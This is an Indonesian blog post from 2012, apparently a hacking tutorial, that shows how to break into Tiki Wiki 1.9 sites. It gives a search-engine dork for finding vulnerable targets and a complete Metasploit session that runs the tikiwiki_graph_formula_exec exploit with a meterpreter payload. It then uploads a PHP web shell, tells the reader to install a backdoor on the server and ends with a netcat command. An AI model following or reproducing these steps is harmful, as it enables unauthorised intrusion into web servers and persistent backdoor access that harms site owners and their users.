Sabtu, 10 Maret 2012

5:23:00 PM

Tiki Wiki adalah CMS Groupware fitur lengkap, berbasis web, multibahasa (40 + bahasa), terintegrasi, semua-dalam-satu Wiki + CMS + groupware, Source Free Software (GNU / LGPL), menggunakan PHP, MySQL, Zend Kerangka, jQuery dan Smarty. Hal ini aktif dikembangkan oleh komunitas internasional yang sangat besar. Tiki dapat digunakan untuk membuat semua jenis aplikasi Web, situs, portal, basis pengetahuan, intranet, dan ekstranet.
berikut ara menjebolnya ^_^ 
Code:
filetype:php inurl:tiki-index.php  sirius  1.9.*
Code:
root@bt:~# msfconsole
msf> search tikiwiki
msf> use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf> set rhost www.target.com
msf> set uri /
msf> show payloads
msf> set payload php/meterpreter/bind_tcp
msf> show options
msf> exploit
meterpreter> upload conf.php



file conf.php adalah shell php yang ane upload ke target, buka browser http://www.target.com/conf.php, install backdoor di server
Code:
root@bt ~# nc
untuk lebih jelasnya, lihat videonya disini 
indonesianbacktrack.co

0 komentar:

Posting Komentar

Tolong di komen ya :)
AKU CINTA INDONESIA